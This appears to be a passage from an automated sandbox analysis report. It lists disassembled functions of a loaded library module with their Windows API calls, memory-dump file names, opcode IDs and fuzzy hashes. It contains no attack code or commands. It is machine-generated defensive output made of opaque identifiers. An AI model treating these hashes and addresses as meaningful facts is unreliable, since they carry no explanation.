                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35F0593170A24CCBDB008B68E850AA137719FFFA1CF280167C40447F53CB20E52ACAA3
                                                                                                                                                                                                                                                                                        Function 6C979E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C979EEF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                        • String ID: Infinity$NaN
                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-4285296124
                                                                                                                                                                                                                                                                                        • Opcode ID: e74cee0d6a647cd24df6685944fa62515d538f1bc8688844608da2eb1e00d8a5
                                                                                                                                                                                                                                                                                        • Instruction ID: 1edb59ae738d70e7671c05780ed0e20d53c4bb4f99371b9463333c59673b5da1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e74cee0d6a647cd24df6685944fa62515d538f1bc8688844608da2eb1e00d8a5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66F08C7160A645CADB428B18F8467443B71AFBF31CF354A56C5080AB42D735A5CA8A92
                                                                                                                                                                                                                                                                                        Function 6C97BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C97BEE3
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C97BEF5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$CallsDisableLoadThread
                                                                                                                                                                                                                                                                                        • String ID: cryptbase.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4137859361-1262567842
                                                                                                                                                                                                                                                                                        • Opcode ID: 77148895aded48203a111be2e7f9ece12f889da3adc61b2108ac5b0a608d108e
                                                                                                                                                                                                                                                                                        • Instruction ID: 2532b3769bb3ec6b3c9382e467f5f2e748e394294c3210d8aff2255ea91e2906
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77148895aded48203a111be2e7f9ece12f889da3adc61b2108ac5b0a608d108e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22D013311C5308E7D7516B908D0DF193778AF59715F20C025F75554951C7B1D450CFD4
                                                                                                                                                                                                                                                                                        Function 6C9650E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C964E9C,?,?,?,?,?), ref: 6C96510A
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C964E9C,?,?,?,?,?), ref: 6C965167
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C965196
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C964E9C), ref: 6C965234
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                                                                                        • Instruction ID: cd6f07ea2daf44bffb69ed3878fb1a5c7bf90d726919fdcaba43e74460f68ad6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2691F135505646CFCB14CF09C890A5ABBA5FF99318B29868CDC489BB56C331FD82CBE0
                                                                                                                                                                                                                                                                                        Function 6C9A08F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE7DC), ref: 6C9A0918
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE7DC), ref: 6C9A09A6
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE7DC,?,00000000), ref: 6C9A09F3
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE7DC), ref: 6C9A0ACB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2fbcdf817a487fc382278c42eb755b2e388b3d6df3fef90647f391a644ff1d27
                                                                                                                                                                                                                                                                                        • Instruction ID: 5b9de31af6a19282f2c78ff869447a22d9df019fa41c66424373c4e1e8c75831
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fbcdf817a487fc382278c42eb755b2e388b3d6df3fef90647f391a644ff1d27
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A516B32B05654CBEB489A95C45472533B5EFEAB24B35913AD86797F80DB31EC02C6C0
                                                                                                                                                                                                                                                                                        Function 6C9BB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C9BB2C9,?,?,?,6C9BB127,?,?,?,?,?,?,?,?,?,6C9BAE52), ref: 6C9BB628
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B90E0: free.MOZGLUE(?,00000000,?,?,6C9BDEDB), ref: 6C9B90FF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B90E0: free.MOZGLUE(?,00000000,?,?,6C9BDEDB), ref: 6C9B9108
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C9BB2C9,?,?,?,6C9BB127,?,?,?,?,?,?,?,?,?,6C9BAE52), ref: 6C9BB67D
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C9BB2C9,?,?,?,6C9BB127,?,?,?,?,?,?,?,?,?,6C9BAE52), ref: 6C9BB708
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C9BB127,?,?,?,?,?,?,?,?), ref: 6C9BB74D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8a01aab7225f84701aab4ac716a8d339c855d6b3e6d954253b27f0658ce99569
                                                                                                                                                                                                                                                                                        • Instruction ID: f115978db099a2a656332247f6328d876b7b83814a1f98c6dd3ce86e2f319347
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a01aab7225f84701aab4ac716a8d339c855d6b3e6d954253b27f0658ce99569
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF51B7B1A05216DBDB14CF18C9C066FB7B5EF89704F168529C85ABBB80DB30E804CBA1
                                                                                                                                                                                                                                                                                        Function 6C9BDF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C9AFF2A), ref: 6C9BDFFD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B90E0: free.MOZGLUE(?,00000000,?,?,6C9BDEDB), ref: 6C9B90FF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B90E0: free.MOZGLUE(?,00000000,?,?,6C9BDEDB), ref: 6C9B9108
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C9AFF2A), ref: 6C9BE04A
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C9AFF2A), ref: 6C9BE0C0
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C9AFF2A), ref: 6C9BE0FE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e86ee1a3af6ff0b2058da280f2af5e79a2830912d924e388342a702ebc3d38bb
                                                                                                                                                                                                                                                                                        • Instruction ID: c867034c1424e54b6c2178f88debe033ca98ca700dc6e05c8019697a8cd94fff
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e86ee1a3af6ff0b2058da280f2af5e79a2830912d924e388342a702ebc3d38bb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F141B1B1608216DFEB14CF68D88036B77BAAF46308F254979D556EB740E731E904CBD2
                                                                                                                                                                                                                                                                                        Function 6C9B6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C9B6EAB
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C9B6EFA
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C9B6F1E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9B6F5C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: malloc$freememcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4259248891-0
                                                                                                                                                                                                                                                                                        • Opcode ID: bb7c11096c02d068a8d9ce596f2582be46aca4b6cd5ab5322db14ee2fafdb1a4
                                                                                                                                                                                                                                                                                        • Instruction ID: a22d2f4f70aca0a47144734f7c380559b2e26087e7586b11d727e34cc30290ad
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb7c11096c02d068a8d9ce596f2582be46aca4b6cd5ab5322db14ee2fafdb1a4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8531E571A1060A9FDB08CF2CC9806AB73E9FF94344F50813DD41AD7651EB31E669C790
                                                                                                                                                                                                                                                                                        Function 6C9CB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C970A4D), ref: 6C9CB5EA
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C970A4D), ref: 6C9CB623
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C970A4D), ref: 6C9CB66C
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C970A4D), ref: 6C9CB67F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: malloc$free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1480856625-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4c2ae7465413480812ddee15985635b6ba84e8556b8cb079783d8e3dead9daa9
                                                                                                                                                                                                                                                                                        • Instruction ID: 392d24bc119dcc89dcd8b7a62ab48144820da0114567d21a05406e42d7c7c1bf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c2ae7465413480812ddee15985635b6ba84e8556b8cb079783d8e3dead9daa9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7931F471E002168FDB10DF58C94466ABBB9FF84325F168529C80A9B201DB31E915CBA3
                                                                                                                                                                                                                                                                                        Function 6C99F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C99F611
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C99F623
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C99F652
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C99F668
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                                        • Instruction ID: 930120d83646c70c7c335615e540f2feefbfff5f45c6baa77110c3b2be83de8b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A314F71A00614AFCB14CF5DCCC0AABB7B9EB94358B188539FA498BB04D672F9448B91
                                                                                                                                                                                                                                                                                        Function 6C9B26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f88442e70426af313a02e1050fe191daf7ecbe7b9cc52c677c6edc37a2de26e7
                                                                                                                                                                                                                                                                                        • Instruction ID: b237b41504ae697f64bfd474cf52261243125ef69d145bcc44673202e28a1dba
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f88442e70426af313a02e1050fe191daf7ecbe7b9cc52c677c6edc37a2de26e7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F0F9B2701601BBFB009A18DCC495B73ADEF65259B200435EA16E3B02E331F918C6A5